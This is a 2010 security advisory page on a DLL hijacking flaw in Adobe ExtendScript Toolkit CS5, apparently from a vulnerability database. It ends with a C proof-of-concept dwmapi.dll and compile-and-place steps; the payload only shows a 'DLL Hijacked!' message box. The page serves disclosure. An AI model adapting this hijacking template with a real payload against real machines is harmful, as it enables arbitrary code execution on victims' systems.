Gjoko KrsticZSL-2010-4952Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit
7.4 High
AI Score
Confidence
Low
Title: Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit
Advisory ID: ZSL-2010-4952
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 26.08.2010
Summary
The ExtendScript Toolkit (ESTK) 3.5.0 is a scripting utility included with Adobe® Creative Suite CS5 and other Adobe applications. The ESTK is used for creating, editing, and debugging JavaScript to be used for scripting Adobe applications.
Description
Adobe ExtendScript Toolkit CS5 suffers from a dll hijacking vulnerability that enables the attacker to execute arbitrary code on a local level. The vulnerable extension is .jsx thru dwmapi.dll library.
Vendor
Adobe Systems Inc. - <http://www.adobe.com>
Affected Version
CS5 v3.5.0.52 ExtendScript 4.1.23 ScriptUI 5.1.37
Tested On
Microsoft Windows XP Professional SP3 (English)
Vendor Status
N/A
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <http://www.exploit-db.com/exploits/14785>
[2] <http://packetstormsecurity.org/filedesc/adobeest_dll.txt.html>
[3] <http://securityreason.com/exploitalert/8780>
[4] <http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/>
[5] <http://www.exploit-db.com/dll-hijacking-vulnerable-applications/>
[6] <http://www.vupen.com/english/advisories/2010/2213>
[7] <http://osvdb.org/show/osvdb/67550>
[8] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3155>
[9] <http://www.securityfocus.com/bid/42749>
Changelog
[26.08.2010] - Initial release
[27.08.2010] - Added reference [1], [2], [3], [4] and [5]
[28.08.2010] - Added reference [6] and [7]
[31.08.2010] - Added reference [8]
[13.11.2010] - Added reference [9]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>/*
Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit
Vendor: Adobe Systems Inc.
Product Web Page: http://www.adobe.com
Affected Version: CS5 v3.5.0.52 ExtendScript 4.1.23 ScriptUI 5.1.37
Summary: The ExtendScript Toolkit (ESTK) 3.5.0 is a scripting utility
included with Adobe� Creative Suite CS5 and other Adobe applications.
The ESTK is used for creating, editing, and debugging JavaScript to be
used for scripting Adobe applications.
Desc: Adobe ExtendScript Toolkit CS5 suffers from a dll hijacking vulnerability
that enables the attacker to execute arbitrary code on a local level. The
vulnerable extension is .jsx thru dwmapi.dll library.
----
gcc -shared -o dwmapi.dll adobeest.c
Compile and rename to dwmapi.dll, create a file test.jsx and put both files
in same dir and execute.
----
Tested on Microsoft Windows XP Professional SP3 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
25.08.2010
*/
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}</windows.h></p></body></html>7.4 High
AI Score
Confidence
Low